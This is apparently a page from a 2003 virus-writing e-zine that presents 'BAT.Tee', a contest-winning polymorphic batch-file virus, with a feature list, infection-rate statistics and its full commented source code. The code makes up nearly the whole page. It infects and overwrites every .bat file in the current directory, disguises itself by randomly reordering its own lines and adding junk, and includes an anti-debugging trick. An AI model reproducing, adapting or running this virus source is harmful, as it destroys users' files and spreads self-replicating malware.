Redemption
| Last article | Table of contents | Next article |
|---|
| Last article | Table of contents | Next article |
|---|
Strange Article - BAT.Tee by Toro
rRlf proudly presents: The winner of our Countertest!
:: ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ :: ßßßÛÛÛÛÛÛ ÜÜ ßßß ßßß ÜÜÜ ÛÛÛÛÛÛßßß :: ±ÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛ° :: ÛÛÛÛ ÛÛÛÛÛÛ ²ÛÛÛÛÛ ÛÛÛÛ :: ÛÛÛÛ ßÛÛÛÛ± ÜÛÛÛÛ² ÛÛÛÛ :: °ÛÛÛÛ ÛÛÛÛÛßÛÛÛÛß ÛÛÛÛ :: ±ÛÛÛÛ ÛÛÛÛ² ÛÛÜÜ ÛÛÛÛ° :: ÜÜ ²ÛÛÛÛ ÛÛÛÛ± ÛÛÛÛ²Ü ÛÛÛÛ± ÜÜÜ :: Û ÛÛÛÛÛ ÛÛÛÛ² ²ÛÛÛÛÛ° ÛÛÛÛ² Û :: Û ÛÛÛÛÛ ÜÛÛÛÛÛ ²ÛÛÛÛ² ÛÛÛÛÛ Û :: ßÜ ßßßßß ßßßß ßßßß ßßßßß Üß :: ÜßßßßßßþThe Knight TemplarsþßßßßßßÜ :: Û Û :: Û Tee by Toro/TKT Û :: Û Û :: Û Û :: ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß :: BAT.Tee encoded by Toro/TKT 2003 for the rRlf contest dated to expire 23.05.2003 :: Features: :: - size: 5632 bytes only :: - encryption by placing lines of codes in random order :: - polymorphic with junk :: - anti-tracing trick :: - infects all files in current directory :: - overwrites new host :: - target platforms: MS-DOS for Win9x, win2k and winXP :: - commented source :: Stats: :: - estimate for average infectionrate: 9.93 min/file on PII 400Mhz, 128MB ram :: - 95% likely that the average infectionrate lies in the area <9.64 , 10.21> :: - estimate for average filesize: 7681 bytes :: - 95% likely that the average filesize lies in the area <7589 , 7773> :: - the size appeares to change with the OS - up to 16kb spotted on win2k, :: though the stats present here is for win98 only :: Compilation notes: :: Use the BatchPatch program, which is not included here. The marker on the :: last line of code must be removed manually after running BatchPatch. :: Additional notes: :: The polyengine is a light version of an exisiting polyengine I wrote quite :: a while back. The same goes for the enryptionengine, which is dated year :: 2000. This was done in order to optimize for size. My major problem was to :: get this virus below or equal 5,5kb. I solved this in several ways, by :: moving code into environmentvariabels, shorten labels and variablenames for :: instance. Due to this limit, the junk-quality is rather poor. Wonder why :: the marker is one character only? Make a guess, and I'll tell you how I :: saved 564 bytes. :: Thanks goes out to... :: CWarrior - for ideas and a good laugh :: philet0ast3r - nice contest! :: Toro, end of April, 2003. @echo off rem Tee by Toro/TKT if not %1!==! goto %1 :: find ourselves set h=%0 if not exist %0 set h=%0.bat :: find 'find.exe' :: call %h% ff label directory filename variable for %%a in (%path%) do call %h% ff %%a find.exe find :: find 'command.com' for compatibility issues for %%a in (%path%) do call %h% ff %%a command.com cs :: setup optimization variables set cx=%cs% /e:32768 /f /c :: allocate memory and enable error-trapping %cx%%h% s @goto end :ff for %%a in (%2%3 %2\%3) do if exist %%a set %4=%%a goto end :s :: setup optimization variables set ax=for %%a in (0 1 2 3 4 5 6 7 8 9) do set bx=f o r $0 %%%%%%%% A $0 i n $0 $1 0 $0 1 $0 2 $0 3 $0 4 $0 5 $0 set dx=6 $0 7 $0 8 $0 9 $2 $0 d o $0 c a l l $0 %%%%%% 1 0 $0 set t=%temp% :: set up neccesary variables set o=%t%\o set t1=%t%\a.bat set t2=%t%\b set j=at for %%a in (*.b%j%) do call %h% inf %%a goto end :inf truename %2 | %find% /i "%h%">g if not errorlevel 1 goto end :: make polyheader, encrypt the body and infect the damned file rem>%o% %cx%%h% p %cx%%h% enc echo :end>>%o% type %o%>%2 goto end :: Optimization variables: :: ax: for %%a in (0 1 2 3 4 5 6 7 8 9) do :: bx: f o r $0 %%%%%%%% A $0 i n $0 $1 0 $0 1 $0 2 $0 3 $0 4 $0 5 $0 6 $0 7 $0 8 $0 9 $2 $0 $0 d o $0 c a l l $0 %%%%%% 1 0 $0 a $0 :: cx: %comspec% /e:32768 /f /c :: dx: :: counter code :: goto c3 for 000->999, :: c2 for 00->99, :: c1 for 0->9 :c3 %ax%call %h% c2 %%a goto end :c2 %ax%call %h% c1 %2%%a %2 %%a goto end :c1 %ax%call %h% %label% %2%%a %3 %4 %%a goto end :enc :: create variable-tree of existing lines of code set label=mem call %h% c3 :: random place these lines :grp :: quit if out of groups if %grps%!==! goto end :: get random group call %h% rnd set grp=%rnd% set f= for %%a in (%grps%) do if %grp%!==%%a! set f=1 if %f%!==! goto grp :sec :: check if this group is empty set f= echo if %%sec%grp%%%!==! set f=1>%t1% call %t1% if %f%!==1! goto rgrp :: get random section call %h% rnd set sec=%rnd% set f= echo for %%%%a in (%%sec%grp%%%) do if %%%%a!==%sec%! set f=1>%t1% call %t1% if %f%!==! goto sec :ln :: check if this section is empty echo if %%ln%grp%%sec%%%!==! set f=0>%t1% call %t1% if %f%!==0! goto rsec :: get random line call %h% rnd set ln=%rnd% set f= echo for %%%%a in (%%ln%grp%%sec%%%) do if %%%%a!==%ln%! set f=1>%t1% call %t1% if %f%!==! goto ln :: add line to outputfile %find% "T%grp%%sec%%ln%" <%h% >>%o% :: add junk :: call %h% junk :: remove line from tree set f= echo for %%%%a in (%%ln%grp%%sec%%%) do if not %%%%a!==%ln%! call %h% addf %%%%a>%t1% echo set ln%grp%%sec%=%%f%%>>%t1% call %t1% goto grp :rgrp :: remove group from tree set f= for %%a in (%grps%) do if not %%a!==%grp%! set f=%f% %%a set grps=%f% goto grp :rsec :: remove section from tree set f= echo for %%%%a in (%%sec%grp%%%) do if not %%%%a!==%sec%! call %h% addf %%%%a>%t1% echo set sec%grp%=%%f%%>>%t1% call %t1% goto sec :addf set f=%f% %2 goto end :mem :: input: %2 = grp|sec|ln, %3 = grp, %4 = sec, %5 = ln :: create a variabletree of groups, sections and lines :: [grp][sec][ln] %find% "T%2" <%h% >g if errorlevel 1 goto end echo set ln%3%4=%%ln%3%4%% %5>%t1% if not %ogrp%!==%3! set grps=%grps% %3 if not %ogrp%!==%3! set ogrp=%3 if not %osec%!==%4! echo set sec%3=%%sec%3%% %4>>%t1% if not %osec%!==%4! set osec=%4 call %t1% goto end :: poly code :p :: a smart way to do a count set label=pline :: anti-debugging echo a|call goto c2 :pline :: get polylayer-data into a variable %find% /i "poly%2" <%h% >%t1% if errorlevel 1 goto end set code2= call %t1% set pcode= :: process polydata for %%a in (%code%) do call %h% proc %%a for %%a in (%code2%) do call %h% proc %%a :: write polycode to file call %h% wrt :: add junk :junk set pcode= call %h% rnd %find% /i "junk%rnd%" <%h% >%t1% call %t1% :: process junk for %%a in (%code%) do call %h% proc %%a :: write junk call %h% rnd call %h% wrt :: add more junk? call %h% rnd for %%a in (0 1 2 3 4 5 6 7 8) do if %%a==%rnd% goto junk goto end :wrt :: write contents of pcode to outputfile echo prompt %pcode%$_>%t1% %cx%%t1%>%t2% %find% " " <%t2% | %find% /v "$">>%o% goto end :proc :: special encoding for space, (, ), " and / for %%a in (0 1 2 3 4) do if %2!==$%%a! goto p%%a :: PATH can be used to many things - making characters uppercase is one of them set opa=%path% path=%2 set f=%2 :: get a random number call %h% rnd :: 50/50 upper- vs lowercase for %%a in (0 1 2 3 4) do if %%a==%rnd% set f=%path% set pcode=%pcode%%f% set path=%opa% goto end :p0 set pcode=%pcode% goto end :p1 set pcode=%pcode%( goto end :p2 set pcode=%pcode%) goto end :p3 set pcode=%pcode%" goto end :p4 set pcode=%pcode%/ goto end :rnd :: Description : returns a rnd number :: Input : none :: Output : rnd = rnd number (0-9) :: Notes : orginal code by Tom Lavedas, modifed to suit my needs. echo @prompt echo %h% calcrnd $t $t$h $g %t%\~rnd.bat$_exit$_>%t%\~rnd.bat %cx%%t%\~rnd.bat | %cs% >nul %t%\~rnd.bat :calcrnd %ax%if %2!==%3%%a! set rnd=%%a %ax%if %3!==%5%%a! set rnd=%%a goto end :: junk-table set code=c d $0 $g g %junk0%%junk5%%junk2% set code=e c h o $0 a %%rnd%% $g g %junk1%%junk6% set code=r e m $0 %junk3%%junk8%%junk7% set code=s e t $g g $0 %junk4%%junk9% :: polylayer set code=@ e c h o $0 o f f%poly00% set code=i f $0 n o t $0 %%%%%% 1 1 ! $q $q ! $0 g o t o $0 %%%%%% 1 1%poly01% set code=s e t $0 h $q %%%%%% 1 0%poly02% set code=i f $0 n o t $0 e x i s t $0 %%%%%% 1 0 $0 s e t $0 h $q %%%%%% 1 0.b a t%poly03% set code=e c h o $0 @ $g ~b .b a t%poly04% set code=%bx%%poly05% set code2=%dx%a $0 %%%%%%%% A%poly05% set code=e c h o $0 :e n d $g $g ~b. b a t%poly06% set code=~b .b a t $0%poly07% set code=: a $0 %poly08% set code=%bx%%poly09% set code2=%dx%b $0 %%%%%% 1 2 %%%%%%%% A%poly09% set code=g o t o $0 e n d%poly10% set code=: b $0 %poly11% set code=%bx%%poly12% set code2=%dx%c $0 %%%%%% 1 2 %%%%%%%% A%poly12% set code=g o t o $0 e n d%poly13% set code=: c $0 %poly14% set code=f i n d $0 $4 i $0 $3 t %%%%%% 1 2 $3 $0 $l %%%%%% 1 h %%%%%% 1 $0 $g $g ~b .b a t%poly15% set code=g o t o $0 e n d%poly16% :end